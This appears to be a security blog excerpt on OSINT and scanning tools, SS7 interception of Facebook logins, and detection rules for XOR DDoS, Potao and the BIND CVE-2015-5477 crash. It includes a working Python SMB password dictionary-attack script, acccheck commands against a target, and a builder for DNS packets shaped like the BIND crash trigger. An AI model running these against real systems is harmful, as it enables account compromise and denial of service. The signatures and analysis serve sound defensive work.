Monday, 27 June 2016

Thursday, 23 June 2016

Automater

Automater is a URL/domain, IP address and MD5 hash OSINT tool aimed at making the analysis process easier for intrusion analysts. Given a target (URL, IP or hash) or a file full of targets, Automater returns relevant results from sources such as IPvoid.com, Robtex.com, Fortiguard.com, unshorten.me, Urlvoid.com, Labs.alienvault.com, ThreatExpert, VxVault and VirusTotal.

Installation:
Automater comes in two flavors: a Python script that works on Linux or Windows, and an exe for Windows.

Windows: The Windows client is currently in development. In the meantime the Python code will work on Windows with a Python 2.7 install.

Linux:
As this is a Python script you will need to ensure you have the correct version of Python, which for this script is Python 2.7. I used mostly standard libraries, but just in case you don't have them, here are the libraries that are required: httplib2, re, sys, argparse, urllib, urllib2 (only httplib2 is outside the standard library and needs a separate install).
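Before any of those sources can be queried, each line of a target file has to be recognised as an IP, a URL/domain or an MD5 hash. The following Python is an added illustration of that first step, written for this page and not taken from Automater; the function names, the "refang" convention (hxxp://, [.] and (.) as analysts write them in reports) and the sample targets are all my own assumptions.

```python
import ipaddress
import re
from typing import Dict, Iterable, List

MD5_RE = re.compile(r"^[0-9a-f]{32}$", re.IGNORECASE)
# One DNS hostname: dot-separated labels of letters, digits and hyphens, alphabetic TLD.
HOSTNAME_RE = re.compile(
    r"^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$", re.IGNORECASE)


def refang(target: str) -> str:
    """Undo the defanging used in analyst reports so the target can be queried.
    This is an assumed convention, not something the original tool documents."""
    t = target.strip()
    t = re.sub(r"^hxxp(s?)://", r"http\1://", t, flags=re.IGNORECASE)
    return t.replace("[.]", ".").replace("(.)", ".")


def classify_target(target: str) -> str:
    """Return 'ip', 'url', 'md5', 'skip' (blank line or # comment) or 'unknown'."""
    t = refang(target)
    if not t or t.startswith("#"):
        return "skip"
    if MD5_RE.match(t):
        return "md5"
    # A bare address, IPv4 or IPv6 (checked before splitting on ':' so v6 survives).
    try:
        ipaddress.ip_address(t)
        return "ip"
    except ValueError:
        pass
    # Strip scheme, path and port so a URL is judged by its host part.
    host = t.split("://", 1)[-1].split("/", 1)[0].split(":", 1)[0]
    try:
        ipaddress.ip_address(host)      # http://10.0.0.1/x is really an IP target
        return "ip"
    except ValueError:
        pass
    if HOSTNAME_RE.match(host):
        return "url"
    return "unknown"


def classify_targets(lines: Iterable[str]) -> Dict[str, List[str]]:
    """Bucket a target file's lines by kind; comments and blanks are dropped."""
    buckets: Dict[str, List[str]] = {"ip": [], "url": [], "md5": [], "unknown": []}
    for line in lines:
        kind = classify_target(line)
        if kind != "skip":
            buckets[kind].append(refang(line))
    return buckets


if __name__ == "__main__":
    # Constructed sample of a targets file.
    sample = ["# targets from the incident", "8.8.8.8", "hxxp://example[.]com/login",
              "d41d8cd98f00b204e9800998ecf8427e", "", "not a target"]
    for kind, items in classify_targets(sample).items():
        print(kind, items)
```

Anything that lands in the "unknown" bucket is worth eyeballing before a run: a stray space or a typo in a hash is the usual cause, and silently querying nine services with a malformed target wastes API quota.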

Acccheck

The tool is designed as a password dictionary attack tool that targets Windows authentication via the SMB protocol. It is really a wrapper script around the 'smbclient' binary, and as a result depends on it for its execution.

The simplest way to run the tool is as follows:

./acccheck.pl -t 10.10.10.1

This mode of execution attempts to connect to the target ADMIN$ share with the username ‘Administrator’ and a [BLANK] for the password.

./acccheck.pl -t 10.10.10.1 -u test -p test

This mode of execution attempts to connect to the target IPC$ share with the username ‘test’ and a password ‘test’.
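As an added example of what such a wrapper does underneath (my own Python, not acccheck's Perl), the block below builds the same kind of smbclient invocation, reads the NT status string smbclient prints on a rejected session setup, and stops the moment the target reports a lockout. The runner is injectable so the logic can be exercised offline; the target address, user name and password list are constructed for illustration.

```python
import subprocess
from typing import Callable, Iterable, List, Tuple

# NT status strings smbclient prints when the server rejects the session setup.
STATUS_LOCKED = "NT_STATUS_ACCOUNT_LOCKED_OUT"
STATUS_BAD_CREDS = ("NT_STATUS_LOGON_FAILURE", "NT_STATUS_WRONG_PASSWORD",
                    "NT_STATUS_ACCESS_DENIED")

Runner = Callable[[List[str]], Tuple[int, str]]


def smbclient_cmd(target: str, share: str, user: str, password: str) -> List[str]:
    """Same shape as the wrapper: -U user%password plus a non-interactive 'dir'.
    An empty password gives 'user%', which smbclient treats as a blank password."""
    return ["smbclient", f"//{target}/{share}", "-U", f"{user}%{password}", "-c", "dir"]


def run_smbclient(cmd: List[str]) -> Tuple[int, str]:
    """Real runner: exit code plus combined stdout/stderr."""
    proc = subprocess.run(cmd, capture_output=True, text=True, timeout=30)
    return proc.returncode, proc.stdout + proc.stderr


def verdict(rc: int, output: str) -> str:
    """Map one attempt to success / fail / locked / error."""
    if STATUS_LOCKED in output:
        return "locked"
    if any(s in output for s in STATUS_BAD_CREDS):
        return "fail"
    return "success" if rc == 0 else "error"


def dictionary_attack(target: str, user: str, passwords: Iterable[str],
                      share: str = "IPC$", runner: Runner = run_smbclient) -> List[Tuple[str, str]]:
    """Try each password in turn; stop on the first success, and stop immediately
    on a lockout so the run does not keep hammering an already-locked account."""
    log: List[Tuple[str, str]] = []
    for pw in passwords:
        rc, out = runner(smbclient_cmd(target, share, user, pw))
        v = verdict(rc, out)
        log.append((pw, v))
        if v in ("success", "locked"):
            break
    return log


if __name__ == "__main__":
    # Constructed target and wordlist; with the real runner this needs smbclient installed.
    for pw, v in dictionary_attack("10.10.10.1", "test", ["test", "Password1", "admin"]):
        print(pw, v)
```

The lockout check is the part the one-liner on this page cannot give you: a domain lockout policy of a handful of attempts means a naive loop over a wordlist locks the account on attempt N and then burns the rest of the list for nothing, which is noisy and, on a real engagement, a denial of service against the client.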

Friday, 17 June 2016

MASSCAN Web Interface

The setup of the masscan web user interface is pretty standard and straightforward. You will need to create a MySQL database, import the database schema, plop the PHP files under your web root, and edit the config file with the correct details. Here’s what this process would look like.

First, install and setup your web server and some other required packages, checkout a copy of the masscan-web-ui repository, and copy over the MASSCAN web ui files to the web root:

Next, you’ll need to create a MySQL database and user for the web application and then import the masscan database schema.

SS7 attacks used to steal Facebook logins

Hijacking a Facebook account with nothing more than the victim's phone number is possible: a group of researchers from Positive Technologies demonstrated it.

“Researchers have proven just that by taking control of a Facebook account with only a phone number and some hacking skills to exploit the SS7 network, a core piece of telecoms infrastructure shown to be vulnerable repeatedly over the last half decade.” reported a blog post published on Forbes.

The attack exploits a weakness in the SS7 signalling network rather than a bug in Facebook itself. Facebook's phone-based account recovery sends a one-time code by SMS, and an attacker with SS7 access can have the victim's SMS delivered to a handset they control; the social network has no way to tell that the message was intercepted, so its own safeguards are bypassed with the phone number alone.

SS7 is the set of signalling protocols that telephone networks have used since the late 1970s. It was designed for a closed circle of trusted operators and has essentially no authentication of the messages exchanged between them, which is why a single rogue or compromised operator can abuse it.

The weaknesses in the SS7 signalling system could be exploited by criminals, terrorists and intelligence agencies to spy on communications. SS7 lets a carrier look up which cell a subscriber's handset is attached to and share that with other carriers for roaming; anyone with SS7 access can issue the same lookups and so track a subscriber's location wherever they are.

Thursday, 16 June 2016

Analysis of Exploit Database Usage

Managing the Exploit Database is one of those ongoing tasks that ends up taking a significant amount of time and often, we don’t take the time to step back and look at the trends as they occur over time. Have there been more exploits over the years? Perhaps fewer? Is there a shift in platforms being targeted? Has the bar for exploits indeed been raised with the increase in more secure operating system protections?

Exploits by Date & Type


Wednesday, 30 September 2015

XOR DDoS Yara & Snort Rules

XOR DDoS Snort Rule

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"Xor-DDoS"; \
    flow:established; content:"BB2FA36AAA9541F0BB2FA36AAA9541F0"; \
    offset:32; depth:64; classtype:trojan-activity; sid:201500010; rev:1;)

XOR DDoS  Yara Rule

rule XOR_DDosv1
{
    meta:
        author = "Akamai SIRT"
        description = "Rule to detect XOR DDos infection"
    strings:
        $st0 = "BB2FA36AAA9541F0"
        $st1 = "md5="
        $st2 = "denyip="
        $st3 = "filename="
        $st4 = "rmfile="
        $st5 = "exec_packet"
        $st6 = "build_iphdr"
    condition:
        all of them
}
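The two rules decide differently: the Snort rule only fires if the 32-byte marker sits entirely inside bytes 32 to 96 of the payload (depth is counted from offset, not from the start of the packet), while the YARA rule is position-independent and needs every string present. The Python below is an added illustration of both decisions over constructed sample data; it is not Akamai's code and not a replacement for running Snort or yara, and the payload and file samples are made up for the test.

```python
from typing import Optional

XOR_DDOS_MARKER = b"BB2FA36AAA9541F0BB2FA36AAA9541F0"

# The strings the YARA rule requires ("all of them").
XOR_DDOS_YARA_STRINGS = [
    b"BB2FA36AAA9541F0", b"md5=", b"denyip=", b"filename=",
    b"rmfile=", b"exec_packet", b"build_iphdr",
]


def snort_content_match(payload: bytes, content: bytes, offset: int = 0,
                        depth: Optional[int] = None) -> bool:
    """Snort 'content' with offset/depth: the search starts `offset` bytes into the
    payload and covers only the next `depth` bytes, so the pattern has to fit
    entirely inside payload[offset:offset + depth]."""
    window = payload[offset:] if depth is None else payload[offset:offset + depth]
    return content in window


def xor_ddos_snort_match(payload: bytes) -> bool:
    """Content part of the Snort rule. flow:established is a stream property the
    rule also requires and is not modelled here."""
    return snort_content_match(payload, XOR_DDOS_MARKER, offset=32, depth=64)


def xor_ddos_yara_match(data: bytes) -> bool:
    """'all of them' over the YARA rule's strings, anywhere in the file."""
    return all(s in data for s in XOR_DDOS_YARA_STRINGS)


# Constructed C2 payloads: a 32-byte header followed by the marker fires; the same
# marker placed before byte 32 or running past byte 96 does not.
PAYLOAD_FIRES = b"\x00" * 32 + XOR_DDOS_MARKER + b"\x00" * 8
PAYLOAD_TOO_EARLY = XOR_DDOS_MARKER + b"\x00" * 80
PAYLOAD_TOO_LATE = b"\x00" * 70 + XOR_DDOS_MARKER

# Constructed file contents standing in for a dropped binary.
SAMPLE_INFECTED = b"\x7fELF" + b"\x00".join(XOR_DDOS_YARA_STRINGS)
SAMPLE_CLEAN = b"\x7fELF" + b"\x00".join(XOR_DDOS_YARA_STRINGS[:-1])   # no build_iphdr

if __name__ == "__main__":
    for name, p in [("fires", PAYLOAD_FIRES), ("too early", PAYLOAD_TOO_EARLY),
                    ("too late", PAYLOAD_TOO_LATE)]:
        print(name, xor_ddos_snort_match(p))
    print("infected", xor_ddos_yara_match(SAMPLE_INFECTED),
          "clean", xor_ddos_yara_match(SAMPLE_CLEAN))
```

If a variant moves the marker in its C2 header the Snort rule goes quiet while the YARA rule still matches the binary on disk, which is a reason to deploy both rather than pick one.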

Tuesday, 4 August 2015

CVE-2015-5477 IPS Signature



An error in the handling of TKEY queries can be exploited by an attacker for use as a denial-of-service vector, as a constructed packet can use the defect to trigger a REQUIRE assertion failure, causing BIND to exit.
  
IPS Signature
 

alert udp any any -> any 53 (msg:"ET EXPLOIT Possible BIND9 DoS? CVE-2015-5477 M2"; content:"|01 00 00 01|"; depth:4; offset:2; content:"|00 01|"; distance:4; within:2; pcre:"/^[^\x00]+\x00/R"; content:"|00 f9|"; within:2; fast_pattern; pcre:"/^..[^\x00]+\x00/Rs"; content:!"|00 f9|"; within:2; threshold: type limit, track by_src, seconds 60, count 1; classtype:attempted-dos; sid:2021573; rev:4;)
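Read byte by byte, the signature requires: flags 0x0100 and QDCOUNT 1 (bytes 2 to 5), ARCOUNT 1 (bytes 10 and 11), a question whose QTYPE is TKEY (0x00f9), and a record after the question whose TYPE is not TKEY. The Python below is an added illustration that builds DNS queries of those shapes and applies the same structural check; it is not the Emerging Threats rule's code nor anything from ISC, the function names are mine, and the packets are constructed for the test rather than captured.

```python
import struct

TYPE_A = 1
TYPE_TKEY = 249          # the |00 f9| the signature looks for


def encode_name(name: str) -> bytes:
    """Wire-format a dotted name as length-prefixed labels plus the root label."""
    labels = [l for l in name.rstrip(".").split(".") if l]
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def decode_name(buf: bytes, off: int):
    """Return (name, offset just past the name), following compression pointers."""
    labels, end = [], None
    while True:
        if off >= len(buf):
            raise ValueError("truncated name")
        n = buf[off]
        if n & 0xC0 == 0xC0:                      # pointer: two bytes, jump, no return
            if end is None:
                end = off + 2
            off = ((n & 0x3F) << 8) | buf[off + 1]
            continue
        off += 1
        if n == 0:
            break
        labels.append(buf[off:off + n].decode("ascii", "replace"))
        off += n
    return ".".join(labels), (off if end is None else end)


def build_query(qname: str, qtype: int, additional=(), txid: int = 0x1234) -> bytes:
    """Standard query (flags 0x0100, QDCOUNT 1) with optional additional RRs given
    as (owner_name, rrtype, rdata) tuples, class IN, TTL 0."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, len(additional))
    question = encode_name(qname) + struct.pack("!HH", qtype, 1)
    extra = b"".join(
        encode_name(owner) + struct.pack("!HHIH", rrtype, 1, 0, len(rdata)) + rdata
        for owner, rrtype, rdata in additional)
    return header + question + extra


def matches_et_2021573(pkt: bytes) -> bool:
    """Structural reading of the signature: standard query, one question of type
    TKEY, ARCOUNT 1, and the record following the question is not TKEY. Like the
    rule it does not look at ANCOUNT/NSCOUNT, so whatever RR follows the question
    is treated as the additional record."""
    if len(pkt) < 12:
        return False
    _, flags, qdcount, _, _, arcount = struct.unpack("!HHHHHH", pkt[:12])
    if flags != 0x0100 or qdcount != 1 or arcount != 1:
        return False
    try:
        _, off = decode_name(pkt, 12)
        qtype = struct.unpack("!H", pkt[off:off + 2])[0]
        if qtype != TYPE_TKEY:
            return False
        _, off = decode_name(pkt, off + 4)        # skip QTYPE and QCLASS
        rrtype = struct.unpack("!H", pkt[off:off + 2])[0]
    except (ValueError, IndexError, struct.error):
        return False
    return rrtype != TYPE_TKEY


# Constructed queries: the shape the signature fires on, a TKEY query whose
# additional record is itself TKEY, and an ordinary A query.
MISMATCHED_TKEY = build_query("example.com", TYPE_TKEY,
                              [("example.com", TYPE_A, b"\x7f\x00\x00\x01")])
PROPER_TKEY = build_query("example.com", TYPE_TKEY, [("example.com", TYPE_TKEY, b"")])
PLAIN_A = build_query("example.com", TYPE_A)

if __name__ == "__main__":
    for name, p in [("mismatched", MISMATCHED_TKEY), ("proper", PROPER_TKEY), ("A", PLAIN_A)]:
        print(name, matches_et_2021573(p))
```

Two caveats a deployment should keep in mind. The signature is written for `udp` to port 53 only, so the same query arriving over TCP is not covered by it. And its second pcre (`^..[^\x00]+\x00`) needs at least one non-null byte before the terminating zero, so an additional record owned by the root name (a lone 0x00) does not satisfy the rule even though the structural check above flags it; the `threshold` clause also means you see at most one alert per source per minute, not one per packet.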

Solution


Upgrade to the patched release most closely related to your current version of BIND. These can be downloaded from http://www.isc.org/downloads.
  • BIND 9 version 9.9.7-P2
  • BIND 9 version 9.10.2-P3

Thursday, 30 July 2015

Potao YARA Rules

private rule PotaoDecoy
{
    strings:
        $mz = { 4d 5a }
        $str1 = "eroqw11"
        $str2 = "2sfsdf"
        $str3 = "RtlDecompressBuffer"
        $wiki_str = "spanned more than 100 years and ruined three consecutive" wide

        $old_ver1 = {53 68 65 6C 6C 33 32 2E 64 6C 6C 00 64 61 66 73 72 00 00 00 64 61 66 73 72 00 00 00 64 6F 63 (00 | 78)}
        $old_ver2 = {6F 70 65 6E 00 00 00 00 64 6F 63 00 64 61 66 73 72 00 00 00 53 68 65 6C 6C 33 32 2E 64 6C 6C 00}      
    condition:
        ($mz at 0) and ( (all of ($str*)) or any of ($old_ver*) or $wiki_str )
}